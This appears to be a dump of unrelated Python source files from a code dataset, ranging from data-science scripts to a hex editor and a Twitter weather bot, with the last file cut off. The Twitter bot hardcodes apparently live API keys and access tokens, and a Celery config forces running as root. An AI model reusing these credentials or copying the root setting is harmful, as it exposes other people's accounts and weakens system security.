This converts these into localisable strings we can give to the user.\nfrom tower import ugettext as _\n\n# Codes:\n# - starting with 100000+ are solitude specific codes.\n# - starting with 500000+ are paypal specific codes.\ncodes = {\n '0': _('There was an error with that request.'),\n # The personal data returned did not match the paypal id specified.\n # This message is defined in solitude, so just pass it through.\n '100001': _('The email returned by Paypal, did not match the PayPal '\n 'email you entered. Please login using %(email)s.'),\n}\n\n\ndef lookup(code, data):\n return codes.get(str(code), codes.get('0')) % data\n\n# See the PayPal docs for information on these codes: http://bit.ly/vWV525\npre_approval_codes = ['539012', '569013', '569016', '569017', '569018',\n '569019', '579010', '579014', '579024', '579025',\n '579026', '579027', '579028', '579030', '579031',\n '589019']\n","sub_path":"lib/pay_server/errors.py","file_name":"errors.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"455140815","text":"#! /usr/bin/python3\r\n\r\nimport sys\r\n#Fill out the following 8 values. CHOOSE ONLY ONE! Annual or Monthly! \r\nrent = 0 \r\nfood = 0\r\nutilites = 0 \r\ngas = 0 \r\nrecreation = 0 \r\ninsurance = 0 \r\nrepairs = 0 #(Car maintenence)\r\nhouseHold = 0 #(ie. toilet paper, soap)\r\n\r\nsumTotal = (rent + food + utilites + gas + recreation + insurance + repairs + houseHold)\r\nif sumTotal == 0:\r\n\tprint('\\n\\tAre you sure you filled out the values in the source code?\\n\\tPlease edit with a text editor.\\n')\r\n\tsys.exit()\r\n\r\nprint(f'\\n\\tDid you choose monthly(m) or yearly?(y): ',end='')\r\nmetric = 'x'\r\nwhile metric != 'm' and metric != 'y':\r\n\tanswer = input()\r\n\tmetric = answer.lower()\r\n\tif metric == 'm':\r\n\t\tsumTotal *= 12\r\n\telif metric == 'y': \r\n\t\tcontinue\r\n\telse: \r\n\t\tprint('\\n\\tType either m or y: ',end='')\r\n\r\nhourlyPay = sumTotal / 52.143 / 40 \r\nprint(f'\\n\\t1. Each year on average you spend, ${sumTotal}.')\r\nprint(f'\\n\\t2. Each day you spend ${(sumTotal/365)}.') #look-up how to format f string to print out 2 decimal places.\r\nprint(f'\\n\\t3. To sustain this, if you work 40 hours a week, \\n\\t you need a job that pays at least: ${hourlyPay/0.8} / hour.')\r\nprint(f'\\n\\t4. Each weekly paycheck should be at least ${int(hourlyPay * 40)} (after tax).\\n')\r\n\r\n","sub_path":"finances/templateSum.py","file_name":"templateSum.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"513596292","text":"# 请输入若干个整数,打印出最大值\n# m = int(input('Input first number >>>'))\n# while True:\n# c = input('Input a number >>>')\n# if c:\n# n = int(c) # 报错由int函数抛出\n# if n > m:\n# m = n\n# print('Max is', m)\n# else:\n# break\n\nw = []\nwhile True:\n n = input(\"pls input n: \")\n if n == 'q':\n break\n else:\n n1 = int(n)\n w.append(n1)\nprint(w)\nprint(max(w))","sub_path":"练习/获取最大值.py","file_name":"获取最大值.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"163265472","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2020/4/22 5:22 下午\n# @Author : evaseemefly\n# @Desc :\n# @Site : \n# @File : celery_con.py\n# @Software: PyCharm\nimport os\nfrom celery import Celery, platforms\nfrom django.conf import settings\nfrom tasks.settings import BROKER_URL, CELERY_RESULT_BACKEND, CELERY_TASK_SERIALIZER, CELERY_RESULT_SERIALIZER, \\\n CELERY_TASK_RESULT_EXPIRES, CELERY_ACCEPT_CONTENT\n\n# 为celery设置环境变量 django -> settings\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'Search_Rescue.settings')\napp = Celery(\n backend='amqp',\n broker=BROKER_URL,\n CELERY_ROUTES={\n 'worker.test1': {'queue': 'test1'}\n },\n)\n# 允许celery以root权限启动\nplatforms.C_FORCE_ROOT = True\napp.conf.update(\n CELERY_TASK_SERIALIZER=CELERY_TASK_SERIALIZER,\n CELERY_RESULT_SERIALIZER=CELERY_RESULT_SERIALIZER,\n CELERY_IGNORE_RESULT=True,\n CELERYD_PREFETCH_MULTIPLIER=10,\n CELERYD_MAX_TASKS_PER_CHILD=200,\n)\n\napp.autodiscover_tasks(lambda: settings.INSTALLED_APPS)\n","sub_path":"review_webserver/Search_Rescue/tasks/celery_con.py","file_name":"celery_con.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"70339408","text":"import pandas as pd\nimport tensorflow as tf\nimport numpy as np\nimport pickle\nimport matplotlib.pyplot as plt\n\nEPOCHS = 5000\n\ncostLog = []\n\ndef next_batch(data, size):\n seed = np.random.randint(0,(data.shape[0]) - size)\n nextSeed = seed + size\n return data[seed:nextSeed]\n\ndef cosDistance(vec1, vec2):\n if np.linalg.norm(vec1) * np.linalg.norm(vec2) == 0:\n return 0\n return np.inner(vec1,vec2)/(np.linalg.norm(vec1) * np.linalg.norm(vec2))\n\n#training data\ninternals = pickle.load(open(\"realWord.p\", \"rb\"))\ninternal = np.array([np.array(a['vec']) for a in internals[0:4000]])\n\n#test data\nexternal = pickle.load(open(\"distortWord.p\", \"rb\"))\nprint(\"Done\")\n\nx = tf.placeholder(tf.float32, shape=[None, 26])\ny = tf.placeholder(tf.float32, shape = [None, 26])\n\nweightsE = {'W1':tf.Variable(tf.truncated_normal([26,20], stddev = 0.1)),'W2':tf.Variable(tf.truncated_normal([20, 15], stddev = 0.1)), 'W3':tf.Variable(tf.truncated_normal([15, 10], stddev = 0.1))}\nbiasesE = {'B1':tf.Variable(tf.truncated_normal([20], stddev = 0.1)),'B2':tf.Variable(tf.truncated_normal([15], stddev = 0.1)), 'B3':tf.Variable(tf.truncated_normal([10], stddev = 0.1))}\n\nweightsD = {'W1':tf.Variable(tf.truncated_normal([10,15], stddev = 0.1)),\"W2\":tf.Variable(tf.random_normal([15, 26], stddev = 0.1))}\nbiasesD = {'B1':tf.Variable(tf.truncated_normal([15], stddev = 0.1)),'B2':tf.Variable(tf.truncated_normal([26], stddev = 0.1))}\n\ndef autoencoder():\n #encoder portion\n bl1 = tf.nn.sigmoid(tf.matmul(x, weightsE['W1']) + biasesE['B1'])\n bl2 = tf.nn.sigmoid(tf.matmul(bl1, weightsE['W2']) + biasesE['B2'])\n bl3 = tf.nn.sigmoid(tf.matmul(bl2, weightsE['W3']) + biasesE['B3'])\n\n #decoder portion need to fix just a copy of above\n el1 = tf.nn.sigmoid(tf.matmul(bl3, weightsD['W1']) + biasesD['B1'])\n el2 = tf.nn.sigmoid(tf.matmul(el1, weightsD['W2']) + biasesD['B2'])\n\n return el2\n\nres = autoencoder()\n\ncost = tf.reduce_mean(tf.pow(res - y, 2))\noptimizer = tf.train.RMSPropOptimizer(0.5).minimize(cost)\n\nwith tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n for e in range(EPOCHS):\n x_batch = next_batch(internal, 15)\n _, c = sess.run([optimizer, cost],feed_dict={x:x_batch, y:x_batch})\n print(c)\n costLog.append(c)\n\n #test suite\n test = np.array([ 0. , 0. , 0. , 0. , 0. , 0. , 0. , 0. , 0. ,\n 0. , 0. , 0. , 0. , 0. , 17. , 0. , 0. , 0. ,\n 0. , 0. , 0. , 0. , 0. , 0. , 2.5, 0.])\n test = np.reshape(test, (1,26))\n yVal = (res.eval(feed_dict={x:test}))\n minVal = np.argmax(np.array([cosDistance(yVal,extVec['vec']) for extVec in external]))\n print(external[minVal])\n print(internals[minVal])\n\nplt.plot(costLog)\nplt.show()\n","sub_path":"stringmatching/autoencoder.py","file_name":"autoencoder.py","file_ext":"py","file_size_in_byte":2772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"427079527","text":"#!/usr/bin/env python\n# coding=utf-8\n# author: zengyuetian\n# 此代码仅供学习与交流,请勿用于商业用途。\n# 小区信息的数据结构\n\n\nclass XiaoQu(object):\n def __init__(self, district, area, name, price, on_sale, age, deal, rent, layout,\n type, fee, property_company, builder, total_block, total_house):\n self.district = district\n self.area = area\n self.price = price\n self.name = name\n self.on_sale = on_sale\n self.age = r'' if not age else age\n self.deal = r'' if not deal else deal\n self.rent = r'' if not rent else rent\n self.layout = r'' if not layout else layout\n self.type = r'' if not type else type\n self.fee = r'' if not fee else fee\n self.property_company = r'' if not property_company else property_company\n self.builder = r'' if not builder else builder\n self.total_block = r'' if not total_block else total_block\n self.total_house = r'' if not total_house else total_house\n\n def text(self):\n return self.district + \",\" + \\\n self.area + \",\" + \\\n self.name + \",\" + \\\n self.price + \",\" + \\\n self.on_sale + \",\" + \\\n self.age + \",\" + \\\n self.deal + \",\" + \\\n self.rent + \",\" + \\\n self.layout + \",\" + \\\n self.type + \",\" + \\\n self.fee + \",\" + \\\n self.property_company + \",\" + \\\n self.builder + \",\" + \\\n self.total_block + \",\" + \\\n self.total_house\n","sub_path":"lib/item/xiaoqu.py","file_name":"xiaoqu.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"104624586","text":"#!/usr/bin/env python\n\"\"\"\nMarijn Schipper, Ioannis Vasilas\n\nScript to run all the scripts\nargv[1] = path to folder with fastq files \n\"\"\"\n\n\nfrom sys import argv\nimport subprocess\nimport os\nimport Fastq_module_2 as fq\nimport hisat as h2\nimport samtools as st\nimport htseq \nimport trimfix as tfix\nimport gff_parser as gp\n\n\ndef pipe(input_path, out_trim, out_stats, out_bias, ref_genome_path, \\\n path_to_gff_file, tr_setting, version_name):\n \"\"\"Returns read counts from rna-seq fastq files, mapped to ref genome\n input: input_path - path to gzipped fastq files(str)\n out_trim - folder name for trim output (str)(def = out_trim)\n out_bias - folder name for bias output (str)(def = out_bias)\n out_stats - folder name for out stats (str)(def = out_stats)\n ref_genome - path to reference genome (str)\n path_to_gff_file - path to gene models .gff file (str)\n tr_set - determines whether to trim (T) or not (F) (Boolean)\n output: tab delimited txt files (htseq std output, see htseq)\n \"\"\"\n #Bool switch for trimming\n if tr_setting:\n files = fq.Fastqrunner(input_path, out_trim, out_stats, out_bias,\\\n tr_setting)\n #delete intermediate data\n if os.path.exists(out_bias):\n command = \"rm -r {}\".format(out_bias)\n run = subprocess.check_output(command,shell = True)\n files = \"./{}/\".format(out_trim)\n else:\n files = './fastq_links/'\n #sort different filenames into correlating group lists\n replicate_list = h2.group_replicates(tr_setting, treatments = \\\n [\"Cf\", \"Mock1\", \"Mock2\", \"Sc\"], timepoints = [\"12\", \"24\", \"48\"])\n #build index with Hisat 2 and ref genome\n index = h2.build_hisat2_index(ref_genome_path, version_name)\n #map and count reads for each trimmed fastq pair in input path\n for (pair1, pair2) in replicate_list:\n sam_file = h2.run_hisat2(files, pair1, pair2, index, tr_setting)\n bam_file = st.run_samtools(sam_file, out_sam)\n path_to_bam = \"./{}/{}\".format(out_sam, bam_file)\n htseq.run_htseq_count(path_to_bam, path_to_gff_file, out_htseq)\n #remove redundant bam files\n st.remove_file(path_to_bam)\n gp.parse_htseq_count_output(out_gcount, path_to_gff_file, \"./{}/\".format(out_htseq))\n return\n\nif __name__==\"__main__\":\n #path to gzipped fastqfiles\n input_path = argv[1]\n tr_setting = argv[2]\n #set necessary variables\n ref_genome_path = argv[3]\n path_to_gff_file = argv[4]\n version_name = argv[5]\n if tr_setting:\n tr_add = '_trimmed'\n else:\n tr_add = '_untrimmed'\n \n #set output paths\n out_bias = 'bias'\n out_trim = 'trim'\n out_stats = 'stats_{}'.format(tr_add)\n out_sam = 'out_sam_{}{}'.format(version_name, tr_add)\n out_gcount = '{}{}'.format(version_name, tr_add)\n out_htseq = 'out_htseq_{}{}'.format(version_name, tr_add)\n \n #run pipe\n pipe(input_path, out_trim, out_stats, out_bias, ref_genome_path,\\\n path_to_gff_file, tr_setting, version_name)\n","sub_path":"Final_pipe.py","file_name":"Final_pipe.py","file_ext":"py","file_size_in_byte":3077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"312274579","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# stagnatingIssues.py\n# \n# Copyright 2012 Mark Mikofski \n# \n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n# \n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n# \n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,\n# MA 02110-1301, USA.\n# \n# \n\nimport account\nimport time\nfrom time import mktime\nfrom datetime import datetime, timedelta, date\n\ndef get_date(d):\n return datetime.fromtimestamp(mktime(time.strptime(d, '%Y-%m-%dT%H:%M:%SZ'))).date()\n\ndef get_stagnatingIssues(account_name, assignee_email, token, include_archived, issueAge, assignee_name):\n\n stagnatingIssues_number = 0\n\n a = account.Account(account_name, token, include_archived)\n\n todays_date = date.today()\n\n html_email_body = ''\n\n projs = a.projects()\n\n printed_project_name = False\n\n something_to_print = False\n\n for proj in projs:\n\n printed_project_name = False\n issues = proj.issuesAssignedTo(assignee_email)\n\n if issues:\n\n for i in issues:\n\n if (i.assignee_email == assignee_email) and (i.status != 'Closed') and (get_date(i.updated_at) + timedelta(days=issueAge) < todays_date):\n something_to_print = True\n stagnatingIssues_number += 1\n printable_subject = i.subject.replace(u\"\\u25ba\", \"►\").encode('ascii', 'ignore')\n\n if printed_project_name == False:\n html_email_body += '
  • ' + proj.name + '
  • \\n
      \\n'\n printed_project_name = True\n\n html_email_body += '
    • ' + printable_subject + ' - Last update: ' + str(get_date(i.updated_at)) + '
    • \\n'\n\n if printed_project_name == True:\n html_email_body += '
    \\n'\n\n html_email_body += '\\n'\n\n if something_to_print == True:\n if stagnatingIssues_number == 1:\n html_email_body = '

    There is ' + str(stagnatingIssues_number) + ' issue that has been stagnating for 90+ days assigned to ' + assignee_name + '.

    \\n
      \\n' + html_email_bod\n else:\n html_email_body = '

      There are ' + str(stagnatingIssues_number) + ' issues that have been stagnating for 90+ days assigned to ' + assignee_name + '.

      \\n
        \\n' + html_email_body\n else:\n html_email_body = '

        Good job ' + assignee_name + '! there are 0 stagnating Sifter issues assigned to you.

        \\n
          \\n' + html_email_body\n \n html_email_body = '\\n

          This is an automatic reminder of forgotten Sifter issues. Some are legitimate bugs and others stop being applicable as we make changes. Keeping Sifter clean helps prioritizing issue fixes.

          \\n' + html_email_body \n\n return html_email_body, str(stagnatingIssues_number)","sub_path":"stagnatingIssues.py","file_name":"stagnatingIssues.py","file_ext":"py","file_size_in_byte":3425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"18047671","text":"# Copyright 2017-2023 QuantRocket - All Rights Reserved\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"\nFunctions for running custom scripts.\n\nFunctions\n---------\nexecute_command\n Execute a Python function or arbitrary shell command on a satellite service.\n\nNotes\n-----\nUsage Guide:\n\n* Custom Scripts: https://qrok.it/dl/qr/satellite\n\"\"\"\nimport sys\nfrom quantrocket.houston import houston\nfrom typing import overload\nfrom quantrocket.utils._typing import FilepathOrBuffer, Any, Union\nfrom quantrocket._cli.utils.output import json_to_cli\nfrom quantrocket._cli.utils.files import write_response_to_filepath_or_buffer\nfrom quantrocket._cli.utils.parse import dict_strs_to_dict, dict_to_dict_strs\n\n__all__ = [\n \"execute_command\",\n]\n\n@overload\ndef execute_command(\n cmd: str,\n return_file: str,\n filepath_or_buffer: FilepathOrBuffer,\n params: dict[str, Any] = None,\n service: str = \"satellite\"\n ) -> None:\n pass\n\n@overload\ndef execute_command(\n cmd: str,\n return_file: str = None,\n filepath_or_buffer: FilepathOrBuffer = None,\n params: dict[str, Any] = None,\n service: str = \"satellite\"\n ) -> dict[str, str]:\n pass\n\ndef execute_command(cmd, return_file=None, filepath_or_buffer=None,\n params=None, service=\"satellite\"):\n \"\"\"\n Execute a Python function or arbitrary shell command on a satellite service.\n\n Parameters\n ----------\n cmd: str, required\n the shell command to run, or the Python function in dot notation (must\n start with \"codeload.\" to be interpreted as a Python function).\n\n return_file : str, optional\n the path of a file to be returned after the command completes\n\n filepath_or_buffer : str, optional\n the location to write the return_file (omit to write to stdout)\n\n params : dict of PARAM:VALUE, optional\n one or more params to pass to the Python function (pass as {param:value})\n\n service : str, optional\n the service name (default 'satellite')\n\n Returns\n -------\n dict or None\n None if return_file, otherwise status message. If cmd uses Python dot\n notation and the Python function returns a value, it will be included in\n the status message as the \"output\" key. Return values must be JSON-serializable.\n\n Notes\n -----\n Usage Guide:\n\n * Custom Scripts: https://qrok.it/dl/qr/satellite\n\n Examples\n --------\n Run a Python function called 'create_calendar_spread' defined in '/codeload/scripts/combos.py'\n and pass it arguments:\n\n >>> execute_command(\"codeload.scripts.combos.create_calendar_spread\",\n params={\"universe\":\"cl-fut\", \"contract_months\":[1,2]})\n\n Run a Python function called 'calculate_signal' defined in '/codeload/scripts/custom.py'\n and retrieve the return value:\n\n >>> response = execute_command(\"codeload.scripts.custom.calculate_signal\")\n >>> if response[\"status\"] == \"success\":\n print(response[\"output\"])\n\n Run a backtrader backtest and save the performance chart to file:\n\n >>> execute_command(\"python /codeload/backtrader/dual_moving_average.py\",\n return_file=\"/tmp/backtrader-plot.pdf\"\n outfile=\"backtrader-plot.pdf\")\n \"\"\"\n _params = {}\n if not service:\n raise ValueError(\"a service is required\")\n if not cmd:\n raise ValueError(\"a command is required\")\n _params[\"cmd\"] = cmd\n if params:\n _params[\"params\"] = dict_to_dict_strs(params)\n if return_file:\n _params[\"return_file\"] = return_file\n\n if not service.startswith(\"satellite\"):\n raise ValueError(\"service must start with 'satellite'\")\n\n response = houston.post(\"/{0}/commands\".format(service), params=_params, timeout=60*60*24)\n\n houston.raise_for_status_with_json(response)\n\n if return_file:\n filepath_or_buffer = filepath_or_buffer or sys.stdout\n write_response_to_filepath_or_buffer(filepath_or_buffer, response)\n else:\n return response.json()\n\ndef _cli_execute_command(*args, **kwargs):\n params = kwargs.get(\"params\", None)\n if params:\n kwargs[\"params\"] = dict_strs_to_dict(*params)\n return json_to_cli(execute_command, *args, **kwargs)\n","sub_path":"quantrocket/satellite.py","file_name":"satellite.py","file_ext":"py","file_size_in_byte":4729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"200975976","text":"\nimport os;\n\ndef getDirectoryList(path):\n directoryList = []\n\n #return nothing if path is a file\n if os.path.isfile(path):\n return []\n\n #add dir to directorylist if it contains .txt files\n if len([f for f in os.listdir(path) if f.endswith('.wav')])>0:\n directoryList.append(path)\n\n for d in os.listdir(path):\n new_path = os.path.join(path, d)\n if os.path.isdir(new_path):\n directoryList += getDirectoryList(new_path)\n\n return directoryList\n\nsrc = '../VocalSetWAV'\n\nwavFolders = getDirectoryList(src)\n\nfor folder in wavFolders:\n print(folder)\n \n os.system('python -m crepe -s 5 ' + folder)\n\n","sub_path":"crepe_all.py","file_name":"crepe_all.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"255360004","text":"import tkinter as tk\nfrom tkinter.filedialog import askopenfilename, asksaveasfilename\nfrom tkinter import messagebox\nimport subprocess as sp\nimport sys\n\npath = \"\"\nin_file = \"\"\nout_file = \"\"\n\n\ndef save_as(args):\n name = asksaveasfilename()\n t = T.get('1.0', 'end')\n arg = ['xxd', '-r', '-g1', '-', name]\n proc = sp.run(arg, input=t.encode(\"UTF-8\"), stdout=sp.PIPE)\n if proc.returncode != 0:\n T.delete('1.0', 'end')\n messagebox.showinfo(\"Error\", \"Can't save file\")\n\n\ndef save(args):\n print(\"save\")\n global path, out_file\n if out_file != \"\":\n path = out_file\n if path != \"\":\n print(\"save\")\n t = T.get('1.0', 'end')\n arg = ['xxd', '-r', '-g1', '-', path]\n proc = sp.run(arg, input=t.encode(\"UTF-8\"), stdout=sp.PIPE)\n if proc.returncode != 0:\n T.delete('1.0', 'end')\n messagebox.showinfo(\"Error\", \"Can't save file\")\n\n\ndef fun(args):\n print(\"ok\")\n global path, in_file, out_file\n if in_file == \"\":\n path = askopenfilename()\n else:\n path = in_file\n in_file = \"\"\n out_file = \"\"\n print(path)\n if path:\n splt = path.split(\"/\")\n F.master.title(splt[-1])\n arg = [\"xxd\", \"-g1\", path]\n proc = sp.run(arg, stdout=sp.PIPE)\n if proc.returncode != 0:\n T.delete('1.0', 'end')\n messagebox.showinfo(\"Error\", \"Can't open file\")\n else:\n T.delete('1.0', 'end')\n T.insert('1.0', proc.stdout)\n\n\ndef undo(args):\n try:\n T.edit_undo()\n except Exception:\n pass\n\n\ndef redo(args):\n try:\n T.edit_redo()\n except Exception:\n pass\n\n\nF = tk.Frame()\nF.master.title(\"main window\")\nF.master.rowconfigure(1, weight=1)\nF.master.columnconfigure(1, weight=1)\nF.master.rowconfigure(0, weight=0)\nF.master.columnconfigure(0, weight=0)\nF.grid(sticky=\"NEWS\", row=0, column=0)\nF.rowconfigure(0, weight=1)\nF.columnconfigure(0, weight=1)\nF2 = tk.Frame(master=F)\nF2.grid(sticky=\"W\", column=0, row=0)\nF2.master.rowconfigure(0, weight=0)\nF2.master.columnconfigure(0, weight=0)\nF2.master.columnconfigure(1, weight=0)\nF2.master.columnconfigure(2, weight=0)\nF2.master.columnconfigure(3, weight=0)\nF2.master.columnconfigure(4, weight=0)\nB1 = tk.Button(master=F2, text=\"Save as\")\nB1.bind(\"\", save_as)\nB1.grid(sticky=\"W\", column=2, row=0)\nB2 = tk.Button(master=F2, text=\"Save\")\nB2.bind(\"\", save)\nB2.grid(sticky=\"W\", column=1, row=0)\nB3 = tk.Button(master=F2, text=\"Open\")\nB3.bind(\"\", fun)\nB3.grid(sticky=\"W\", column=0, row=0)\nB4 = tk.Button(master=F2, text=\"Undo\")\nB4.bind(\"\", undo)\nB4.grid(sticky=\"W\", column=3, row=0)\nB5 = tk.Button(master=F2, text=\"Redo\")\nB5.bind(\"\", redo)\nB5.grid(sticky=\"W\", column=4, row=0)\nscrl = tk.Scrollbar(F)\nscrl.grid(sticky=\"NS\", row=1, column=1)\nT = tk.Text(master=F, height=24, width=80, font=(\"Source Code Pro\", \"14\"),\n yscrollcommand=scrl.set, undo=True)\nT.grid(sticky=\"NEWS\", column=0, row=1)\nargv = sys.argv\nif len(argv) == 2:\n in_file = argv[1]\n fun(1)\nelif len(argv) == 3:\n in_file = argv[1]\n fun(1)\n out_file = argv[2]\n save(1)\ntk.mainloop()\n","sub_path":"task_t.py","file_name":"task_t.py","file_ext":"py","file_size_in_byte":3179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"18149975","text":"# Dependencies\nimport tweepy\nimport time\nimport json\nimport random\nimport requests as req\nimport datetime\n\n# Twitter API Keys\nconsumer_key = \"Ed4RNulN1lp7AbOooHa9STCoU\"\nconsumer_secret = \"P7cUJlmJZq0VaCY0Jg7COliwQqzK0qYEyUF9Y0idx4ujb3ZlW5\"\naccess_token = \"839621358724198402-dzdOsx2WWHrSuBwyNUiqSEnTivHozAZ\"\naccess_token_secret = \"dCZ80uNRbFDjxdU2EckmNiSckdoATach6Q8zb7YYYE5ER\"\n\n# Weather API\napi_key = \"25bc90a1196e6f153eece0bc0b0fc9eb\"\n\n\n# Create a function that gets the weather in London and Tweets it\ndef WeatherTweet():\n\n # Construct a Query URL for the OpenWeatherMap\n url = \"http://api.openweathermap.org/data/2.5/weather?\"\n city = \"London\"\n units = \"imperial\"\n query_url = url + \"appid=\" + api_key + \"&q=\" + city + \"&units=\" + units\n\n # Perform the API call to get the weather\n weather_response = req.get(query_url)\n weather_json = weather_response.json()\n print(weather_json)\n\n # Twitter credentials\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_token_secret)\n api = tweepy.API(auth, parser=tweepy.parsers.JSONParser())\n\n # Tweet the weather\n api.update_status(\n \"London Weather as of %s: %s F\" %\n (datetime.datetime.now().strftime(\"%I:%M %p\"),\n weather_json[\"main\"][\"temp\"]))\n\n # Print success message\n print(\"Tweeted successfully, sir!\")\n\n\n# Set timer to run every 1 hour\nwhile(True):\n WeatherTweet()\n time.sleep(3600)\n","sub_path":"01-ClassContent/07-Social-Analytics/1/Supplemental/Solved/Stu_Weather_Tweets/Weather_Tweets.py","file_name":"Weather_Tweets.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"134904750","text":"def divisors(x):\n div = 1\n divisors = []\n while div < x:\n if x % div == 0:\n divisors = divisors + [div]\n\n div = div + 1\n\n return divisors\n\nn = input(\"Enter n : \")\nn = int(n)\n\nprint(divisors(n))\n","sub_path":"week3/2-Resolve-with-Functions/divisors(x).py","file_name":"divisors(x).py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"560770081","text":"from django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n url(r'^create/$',\n views.user_create,\n name='user_create'),\n url(r'^confirm/([1-9]\\d*)/([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})/$',\n views.user_confirm,\n name='user_confirm'),\n url(r'^login/$',\n views.user_login,\n name='user_login'),\n url(r'^([1-9]\\d*)/$',\n views.user_home,\n name='user_home'),\n]\n\n","sub_path":"bfuser/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"580980132","text":"#!/usr/bin/env python\n\n# type atoms of a molecule a la atom pairs\n# (nb. pi electrons if > 0, elt. symbol, nbHA neighbors)\n\nfrom __future__ import print_function\n\nimport common, os, rdkit, sys, time\nfrom rdkit import Chem\nfrom rdkit import RDConfig\nfrom rdkit.Chem import AllChem, Descriptors\nfrom rdkit.Chem.AtomPairs import Pairs\n\ndef RobustSmilesMolSupplier(filename):\n with open(filename) as f:\n for line in f:\n words = line.split()\n smile = words[0]\n name = \" \".join(words[1:]) # everything after the SMILES string\n yield (name, Chem.MolFromSmiles(smile))\n\ndef SdfMolSupplier(fn):\n for mol in Chem.SDMolSupplier(fn):\n if mol:\n name = mol.GetProp('_Name')\n yield (name, mol)\n\ndef nb_heavy_atom_neighbors(a):\n res = 0\n for neighb in a.GetNeighbors():\n if neighb.GetAtomicNum() != 1:\n res += 1\n return res\n\nPeriodicTable = Chem.GetPeriodicTable()\n\ndef type_atom(a):\n nb_pi_electrons = Pairs.Utils.NumPiElectrons(a)\n symbol = PeriodicTable.GetElementSymbol(a.GetAtomicNum())\n nbHA = nb_heavy_atom_neighbors(a)\n res = None\n if nb_pi_electrons > 0:\n res = \"%d%s%d\" % (nb_pi_electrons, symbol, nbHA)\n else:\n res = \"%s%d\" % (symbol, nbHA)\n return res\n\ndef encode_molecule(m):\n return map(type_atom, m.GetAtoms())\n\ndef print_encoded_atoms(atoms):\n for i, a in enumerate(atoms):\n print(\"%d %s\" % (i, a))\n\nif __name__ == '__main__':\n before = time.time()\n argc = len(sys.argv)\n if argc != 2:\n print(\"usage: %s input.{smi|sdf}\" % sys.argv[0])\n sys.exit(1)\n input = sys.argv[1]\n mol_supplier = None\n if input.endswith(\".smi\"):\n mol_supplier = RobustSmilesMolSupplier\n if input.endswith(\".sdf\"):\n mol_supplier = SdfMolSupplier\n count = 0\n for name, mol in mol_supplier(input):\n print(\"#atoms:%d %s\" % (mol.GetNumAtoms(), name))\n print_encoded_atoms(encode_molecule(mol))\n common.print_bonds(mol)\n common.print_distance_matrix(mol)\n count += 1\n after = time.time()\n dt = after - before\n print(\"%d molecules at %.2f mol/s\" % (count, count / dt), file=sys.stderr)\n","sub_path":"bin/type_atoms.py","file_name":"type_atoms.py","file_ext":"py","file_size_in_byte":2212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"501041053","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\n\nimport matplotlib.pyplot as plt\nfrom sklearn.datasets import make_classification\nfrom sklearn.decomposition import PCA\nimport pandas as pd\nimport numpy as np\n#__import__(\"imbalanced-learn.oversampling\")\nfrom imblearn.over_sampling import SMOTE\n \nX=pd.read_csv(\"train_without_smote_mj.csv\")\ny=X['target']\ndel X['target']\nmethod=SMOTE(ratio = 0.33)\nX_resampled = []\ny_resampled = []\nX_res_vis = []\nX_res, y_res = method.fit_sample(X, 